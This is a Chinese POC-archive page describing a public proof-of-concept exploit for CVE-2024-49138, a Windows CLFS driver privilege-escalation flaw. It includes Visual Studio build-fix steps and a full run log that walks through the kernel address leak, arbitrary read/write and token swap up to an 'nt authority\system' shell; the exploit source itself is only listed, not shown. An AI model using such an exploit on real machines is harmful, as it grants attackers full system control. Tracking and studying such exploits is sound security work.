POC详情: ade5b35355af1a5c318d5e253674410693b9bca1

来源
关联漏洞
标题: Microsoft Windows Common Log File System Driver 安全漏洞 (CVE-2024-49138)
描述:Microsoft Windows Common Log File System Driver是美国微软(Microsoft)公司的通用日志文件系统 (CLFS) API 提供了一个高性能、通用的日志文件子系统,专用客户端应用程序可以使用该子系统并且多个客户端可以共享以优化日志访问。 Microsoft Windows Common Log File System Driver存在安全漏洞。攻击者利用该漏洞可以提升权限。以下产品和版本受到影响:Windows Server 2008 R2 for x64-
介绍
# CVE-2024-49138-POC

# Fix Error Decombine
```
C:\Program Files\Microsoft Visual Studio\2022\Professional\MSBuild\Microsoft\VC\v170\Microsoft.CppBuild.targets(456,5): error MSB8020: The build tools for Visual Studio 2019 (Platform Toolset = 'v142') cannot be found. To build using the v142 build tools, please install Visual Studio 2019 build tools.  Alternatively, you may upgrade to the current Visual Studio tools by selecting the Project menu or right-click the solution, and then selecting "Retarget solution".
```
# Option 1: Install v142 Build Tools for Visual Studio 2022

**1. Open Visual Studio Installer:**

Go to the Start Menu and open the Visual Studio Installer.

**2. Modify Your Visual Studio Installation:**

Select Visual Studio 2022 and click Modify.

**3. Install the Required Toolset:**

In the Individual Components tab, search for:
**MSVC v142 - VS 2019 C++ x64/x86 build tools**
Select it and click Install.
**4. Rebuild the Project:**
Once installed, rebuild your project in Visual Studio 2022.

Proof of Concept that exploits [CVE-2024-49138](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49138) in CLFS.sys. 

CrowdStrike detected the vulnerability actively exploited by threat actors.

Tested on **Windows 11 23h2**.

A thorough analysis will be provided in a detailed blog post.

## Compile and Run

Compile x64 Release version.

Run and get a system shell.

```
PS C:\Users\IEUser\Desktop> whoami
windows11\ieuser
PS C:\Users\IEUser\Desktop> .\CVE-2024-49138-POC.exe
Directory created successfully: C:\temp
Directory created successfully: C:\temp
file opened successfully
AddLogContainer successful
hResource = 0x00007FF7CDB89080
hResource = 0x00007FF7CDB890A0
pResourceData = 0x00007FF7CDB890A0
Resource size: 65536 bytes
Resource written to output.bin successfully.
Kernel Base Address: 0xFFFFF80339800000
Kernel Name: ntoskrnl.exe
NtReadVirtualMemory = 0x00007FFFAF0EFB40
NtWriteVirtualMemory = 0x00007FFFAF0EFAA0
pcclfscontainer = 0x0000000002100000
address_to_write = 0xFFFFC201424CC2B2
Process priority set to REALTIME_PRIORITY_CLASS.
Thread priority set to the highest level: TIME_CRITICAL.
triggering vuln...CreateLogFile failed with error 6601
Process priority set to NORMAL_PRIORITY_CLASS.
Thread priority set to the highest level: THREAD_PRIORITY_NORMAL.
vuln triggered
reading base of ntoskrnl to check we have arbitrary read/write
buf = 0x0000000300905A4D
swapping tokens...
current token address = 0xFFFFC201423EC578
systemtoken = 0xFFFFD401F501C6E9
Overwriting process token..
token swapped. Restoring PreviousMode and spawning system shell...
Microsoft Windows [Version 10.0.22631.2861]
(c) Microsoft Corporation. All rights reserved.

C:\Users\IEUser\Desktop>whoami
nt authority\system

C:\Users\IEUser\Desktop>
```

![systemshell](https://github.com/user-attachments/assets/788d4096-1c9c-46a6-ad52-988e6538dd18)


文件快照

[4.0K] /data/pocs/ade5b35355af1a5c318d5e253674410693b9bca1 ├── [ 17K] CVE-2024-49138-POC.cpp ├── [1.4K] CVE-2024-49138-POC.rc ├── [1.4K] CVE-2024-49138-POC.sln ├── [7.1K] CVE-2024-49138-POC.vcxproj ├── [1.3K] CVE-2024-49138-POC.vcxproj.filters ├── [ 168] CVE-2024-49138-POC.vcxproj.user ├── [ 64K] mylogdddd.blf.blf ├── [2.9K] RCa04816 ├── [2.8K] README.md ├── [ 460] resource.h └── [ 16K] UpgradeLog.htm 0 directories, 11 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。